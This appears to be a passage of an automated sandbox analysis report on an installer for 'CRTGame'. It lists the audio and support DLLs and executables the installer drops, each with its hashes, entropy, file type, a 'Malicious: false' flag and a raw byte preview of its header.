Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\CRTGame\bin\x86\lessmsi\lessmsi-v1.6.91.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	506871
Entropy (8bit):	7.998074018431883
Encrypted:	true
SSDEEP:	12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
MD5:	D52F8AE89AC65F755C28A95C274C1FFE
SHA1:	50D581469FF0648EE628A027396F39598995D8B0
SHA-256:	2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
SHA-512:	B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
Malicious:	false
Preview:	PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...."......US.R.SB....i.....T.R.......3./;/..Q.].{....:s=t.c....\|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx\|...}MA.n.].q:!]iB`....\|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O....P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	512014
Entropy (8bit):	6.566561154468342
Encrypted:	false
SSDEEP:	12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:	C4A2068C59597175CD1A29F3E7F31BC1
SHA1:	89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:	7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:	0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	126478
Entropy (8bit):	6.268811819718352
Encrypted:	false
SSDEEP:	3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
MD5:	6E93C9C8AADA15890073E74ED8D400C9
SHA1:	94757DBD181346C7933694EA7D217B2B7977CC5F
SHA-256:	B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
SHA-512:	A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	845312
Entropy (8bit):	6.581151900686739
Encrypted:	false
SSDEEP:	24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
MD5:	00C672988C2B0A2CB818F4D382C1BE5D
SHA1:	57121C4852B36746146B10B5B97B5A76628F385F
SHA-256:	4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
SHA-512:	C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	648384
Entropy (8bit):	6.666474522542094
Encrypted:	false
SSDEEP:	12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
MD5:	CE7DE939D74321A7D0E9BDF534B89AB9
SHA1:	56082B4E09A543562297E098A36AADC3338DEEC5
SHA-256:	A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
SHA-512:	03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	6.641153481093122
Encrypted:	false
SSDEEP:	6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:	BC824DC1D1417DE0A0E47A30A51428FD
SHA1:	C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:	A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:	566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	867854
Entropy (8bit):	4.9264497464202694
Encrypted:	false
SSDEEP:	12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
MD5:	B476CA59D61F11B7C0707A5CF3FE6E89
SHA1:	1A1E7C291F963C12C9B46E8ED692104C51389E69
SHA-256:	AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
SHA-512:	D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p..........................................................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc..........,..................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	394752
Entropy (8bit):	6.662070316214798
Encrypted:	false
SSDEEP:	6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
MD5:	A4123DE65270C91849FFEB8515A864C4
SHA1:	93971C6BB25F3F4D54D4DF6C0C002199A2F84525
SHA-256:	43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
SHA-512:	D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	68042
Entropy (8bit):	6.090396152400884
Encrypted:	false
SSDEEP:	768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
MD5:	5DDA5D34AC6AA5691031FD4241538C82
SHA1:	22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
SHA-256:	DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
SHA-512:	08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	123406
Entropy (8bit):	6.263889638223575
Encrypted:	false
SSDEEP:	1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
MD5:	B49ECFA819479C3DCD97FAE2A8AB6EC6
SHA1:	1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
SHA-256:	B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
SHA-512:	18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................\|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	562190
Entropy (8bit):	6.388293171196564
Encrypted:	false
SSDEEP:	12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
MD5:	713D04E7396D3A4EFF6BF8BA8B9CB2CD
SHA1:	D824F373C219B33988CFA3D4A53E7C2BFA096870
SHA-256:	00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
SHA-512:	30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22542
Entropy (8bit):	5.5875455203930615
Encrypted:	false
SSDEEP:	384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
MD5:	E1C0147422B8C4DB4FC4C1AD6DD1B6EE
SHA1:	4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
SHA-256:	124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
SHA-512:	A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-93I59.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-9INH5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.25938266470983
Encrypted:	false
SSDEEP:	192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
MD5:	228EE3AFDCC5F75244C0E25050A346CB
SHA1:	822B7674D1B7B091C1478ADD2F88E0892542516F
SHA-256:	7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
SHA-512:	7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	25614
Entropy (8bit):	6.0293046975090325
Encrypted:	false
SSDEEP:	768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
MD5:	B82364A204396C352F8CC9B2F8ABEF73
SHA1:	20AD466787D65C987A9EBDBD4A2E8845E4D37B68
SHA-256:	2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
SHA-512:	C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	6.232860260916194
Encrypted:	false
SSDEEP:	768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
MD5:	B162992412E08888456AE13BA8BD3D90
SHA1:	095FA02EB14FD4BD6EA06F112FDAFE97522F9888
SHA-256:	2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
SHA-512:	078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram\|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	240654
Entropy (8bit):	6.518503846592995
Encrypted:	false
SSDEEP:	6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
MD5:	4F0C85351AEC4B00300451424DB4B5A4
SHA1:	BB66D807EDE0D7D86438207EB850F50126924C9D
SHA-256:	CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
SHA-512:	80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	852754
Entropy (8bit):	6.503318968423685
Encrypted:	false
SSDEEP:	12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
MD5:	07FB6D31F37FB1B4164BEF301306C288
SHA1:	4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
SHA-256:	06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
SHA-512:	CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............

C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315918
Entropy (8bit):	6.5736483262229735
Encrypted:	false
SSDEEP:	6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
MD5:	201EA988661F3D1F9CA5D93DA83425E7
SHA1:	D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
SHA-256:	4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
SHA-512:	6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
Malicious:	false
